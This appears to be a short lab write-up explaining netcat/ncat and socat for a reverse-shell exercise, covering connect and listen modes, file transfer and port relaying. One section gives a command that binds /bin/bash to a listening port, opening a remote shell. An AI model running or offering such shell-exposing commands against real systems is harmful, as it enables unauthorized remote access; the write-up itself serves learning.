Write-up to Simple Netcat Socat Reverse Shells
In an exercise the reverse shell should be created with Netcat. This program is according to Wikipedia fairly general-purpose:
- Outgoing or incoming connections, TCP or UDP, to or from any port.
- Full DNS forward/backward checking, with appropriate warnings.
- Ability to use any local source port
- Ability to use any locally configured network source address
- Built-in port scanning capabilities with random number generator
- Built-in loose source routing capability
- Can read command line arguments from standard input
- Slow send mode, one line every N seconds
- Hex dump of sent and received data
- Optional ability to let another program service establish connections
- Optional telnet options responder
The shell tool is usually nc or ncat. The configuration is easier if you keep in mind that nc works in 2 modes. The connect mode allows for example the output of local programs to be sent over the network (e.g. to socat). The listen mode does exactly the opposite, waits until someone sends it data. Default is the connect mode in ncat. The documentation for ncat is very helpful. For example, ncat makes tcp connections by default and with -u you can switch to udp.
Examples for ncat
Examples for connect
ncat elsensohn.ch 80 # And inside the program GET / # Result is a HTTP HTML page
Examples for listen
ncat -l 8080 # Connection afterwards with e.g. telnet telnet localhost 8080
Examples for sending / receiving of a file
# send a file ncat -l 8080 > file.txt # receive a file ncat 192.168.1.100 8080 --send-only < data.txt
Remote Code Execution Example
# run received text in bash ncat -l 10000 -e /bin/bash # send text to let it interpret by the receiver (works also with other tools) ncat localhost 8080
In the exercise is also used socat that is a relay for bidirectional data transmissions between two independent data channels. There are many types of channels that socat can connect, including (see Getting Started Socat):
- Sockets (UNIX, IP4, IP6 - raw, UDP, TCP)
- file descriptors (stdin, etc.)
According to Getting Started Socat netcat and Socat do similar things, but Socat has more additional functionality, such as allowing multiple clients to listen on a port or reusing connections.
Is it possible to use UDP?
with the -u parameter.
Can you run an HTTP endpoint with netcat?
You could put netcat in between to do port redirection for example. But it needs a http server, because netcat only does the transfer.